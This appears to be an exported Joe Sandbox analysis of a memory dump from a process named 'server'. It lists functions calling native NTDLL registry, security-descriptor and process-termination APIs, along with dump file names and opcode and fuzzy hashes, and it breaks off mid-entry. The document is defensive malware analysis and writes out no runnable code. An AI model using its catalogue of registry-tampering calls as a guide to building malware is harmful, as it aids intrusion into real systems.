Function 00A19502 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtRestoreKey.NTDLL ref: 00A1951B

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Restore
String ID:
API String ID: 1214912099-0
Opcode ID: 68d186d1160bf75172cdb88ec4303d3224d7891b56835b1727ce78219d3155e9
Instruction ID: da59b1d4ab7116966325b780d2e4e6705701d3a494b50fc97aba8ceeb5368b85
Opcode Fuzzy Hash: 68d186d1160bf75172cdb88ec4303d3224d7891b56835b1727ce78219d3155e9
Instruction Fuzzy Hash: A4C08CC0600140BEFF85D3F88C0CFB325ADC3C030AF08406CB001C3014DA508C41D230

Function 00A193CE Relevance: 1.5, APIs: 1, Instructions: 12nativeCOMMON

Download Yara Rule

APIs

NtDeleteValueKey.NTDLL ref: 00A193E5

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: DeleteValue
String ID:
API String ID: 1108222502-0
Opcode ID: 7e44e94f6d8af6ac593f5dc7a16ab0af0522a976da85c810963405a9efedf936
Instruction ID: 90d11b538bb3b77df5af41e83ba7dfc23f75d99217b4d00ad6d86e8895d5e3ac
Opcode Fuzzy Hash: 7e44e94f6d8af6ac593f5dc7a16ab0af0522a976da85c810963405a9efedf936
Instruction Fuzzy Hash: 1EC048D0A10184BEEF01A3FCAE0DBB72AAC87D474AF048598B056C20A0CA298981E620

Function 00A19406 Relevance: 1.5, APIs: 1, Instructions: 12nativeCOMMON

Download Yara Rule

APIs

NtLoadKey.NTDLL ref: 00A1941D

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8f5d772d1e7f5c8ab5a141bc9b337b558ebad1a54969e53b5e217e5d7544f8f6
Instruction ID: 5e9eb259f343fdd010f277f729d33fb32415243d4697d3fc25d18674fbf73597
Opcode Fuzzy Hash: 8f5d772d1e7f5c8ab5a141bc9b337b558ebad1a54969e53b5e217e5d7544f8f6
Instruction Fuzzy Hash: 10C04CD4600150BEEF11D7F85C5CB76155C87C9701F44C4687006C1155DA144841D621

Function 00A19586 Relevance: 1.5, APIs: 1, Instructions: 12nativeCOMMON

Download Yara Rule

APIs

NtTerminateProcess.NTDLL ref: 00A1959D

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: ade2a54190a1a76b7c5a945a008d5258fddd240db8b7c7ca7493395b1eb3670f
Instruction ID: 6f6a04d8478061d178efcc61b11a92bceb9e038ba83e7c1e530745c76371db95
Opcode Fuzzy Hash: ade2a54190a1a76b7c5a945a008d5258fddd240db8b7c7ca7493395b1eb3670f
Instruction Fuzzy Hash: 79C04CD0554250AEFF06D3F85C1CB76255D97C8707F5484A87015E2054C6144945E620

Function 00A19522 Relevance: 1.5, APIs: 1, Instructions: 12nativeCOMMON

Download Yara Rule

APIs

NtSaveKey.NTDLL ref: 00A19539

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Save
String ID:
API String ID: 4115961312-0
Opcode ID: 88f496d6a6a64387898f65a0beded9ed6880285c65049d58cd27c17f7a4dd608
Instruction ID: 7cf519739b9028c2e64195db21246e7dd2bed33bafcf5a80b3416ad5861a24fa
Opcode Fuzzy Hash: 88f496d6a6a64387898f65a0beded9ed6880285c65049d58cd27c17f7a4dd608
Instruction Fuzzy Hash: 52C04CD0A00140BEFF8193F85D0CBB715DE87D4755F0884947045D1051DA144945D620

Function 00A19098 Relevance: 1.5, APIs: 1, Instructions: 5nativeCOMMON

Download Yara Rule

APIs

NtSetSecurityObject.NTDLL ref: 00A1909B

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: ObjectSecurity
String ID:
API String ID: 2240786066-0
Opcode ID: c91344c75d2528641b51a6f279a6cb5007ac32305bca5e4757c1de00a8374e6e
Instruction ID: 8a473a13ee93989d612d251f783e2e1a2f3d2b221fda2c40e5584674c92d48f0
Opcode Fuzzy Hash: c91344c75d2528641b51a6f279a6cb5007ac32305bca5e4757c1de00a8374e6e
Instruction Fuzzy Hash: 999002E0810104AEAF04A7E29D0DD37B66CD5C07023405948B005C151095645841C930

Function 00A1922C Relevance: 1.5, APIs: 1, Instructions: 5nativeCOMMON

Download Yara Rule

APIs

NtOpenKey.NTDLL ref: 00A1922F

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 97e79d6f2c0f8ac96e02ac60f77866f14f128866dd2708f5bc3f87838c27c296
Instruction ID: e7b36d7d4e6cd2e43b8839fd67ffa73fd32704627f7ae5e87ca08ab9209c3ee0
Opcode Fuzzy Hash: 97e79d6f2c0f8ac96e02ac60f77866f14f128866dd2708f5bc3f87838c27c296
Instruction Fuzzy Hash: 269002E0910100AFAD0497E19E0DC77262CD6D07063044548B00586011A6687805C530

Function 00A194F8 Relevance: 1.5, APIs: 1, Instructions: 5nativeCOMMON

Download Yara Rule

APIs

NtReplaceKey.NTDLL ref: 00A194FB

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Replace
String ID:
API String ID: 3273661913-0
Opcode ID: cbf3930a31e8766e6119cf48479f2dbc3c1531798ac35ac1b9f3449ef08c9df6
Instruction ID: 094b3d82124d5ff00be268e237464db6b3bdad27f3204cae60377b83eb5422e7
Opcode Fuzzy Hash: cbf3930a31e8766e6119cf48479f2dbc3c1531798ac35ac1b9f3449ef08c9df6
Instruction Fuzzy Hash: 599002E4910100AEAE5497E09D0DC37252CD5C070130486497001C1210E5645801C530

Function 00A19438 Relevance: 1.5, APIs: 1, Instructions: 5nativeCOMMON

Download Yara Rule

APIs

NtLoadKey2.NTDLL ref: 00A1943B

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Key2Load
String ID:
API String ID: 2615624000-0
Opcode ID: 9d888eb0dacabc403f276da66f7c87685d0d36e23215ca0c6e3458eb872e6301
Instruction ID: 94f4de1529b8b50742e3c3dc958c1fa5c5037f4716a896b2a115e6acfd9189e5
